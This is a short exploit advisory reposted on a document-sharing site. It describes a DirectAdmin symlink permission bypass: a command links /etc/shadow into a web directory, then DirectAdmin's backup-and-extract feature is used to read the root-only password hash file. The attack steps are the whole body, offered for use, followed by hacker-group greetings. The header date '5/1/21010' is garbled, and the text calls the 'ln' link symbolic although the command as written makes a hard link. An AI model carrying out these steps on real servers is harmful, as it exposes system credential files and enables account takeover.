Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 Subject: DirectAdmin <= 1.33.6 Symlink Permission Bypass
2 Date: 5/1/21010
3 Author: alnjm33
4 Tested on: 1.33.6 −− 1.33.1 and i think it’s work in all versions
5 Home:sec−war.com
6 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::exploit:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::
7 first
8 must execute this command on the server >>>> ln /etc/shadow
9 to make symbolic link to shadow file in any dir
10 after that go to
11 Create/Restore Backups in direct and make
12 ((Domains Directory: Backs up))
13 the backup file will be in
14 /home/test/backups
15 go there then Extract tar.gz file
16 after extract
17 go to
18 /home/test/backups/domains/test.com/public_html
19 or the dir which you execute the command
20 and now you can read the shadow file which have 400 Permission
21
22 Greetz to :PrEdAtOr −Sh0ot3R − xXx − Mu$L!m−h4ck3r − ahmadso −JaMbA−RoOt_EgY−jago−dz−XR57 all sec−war.com members<htt
p://sec−war.com/cc//index.php?showuser=36>
Page 1/1
DirectAdmin 1.33.6 Symlink Permission Bypass
alnjm33
01/06/2010
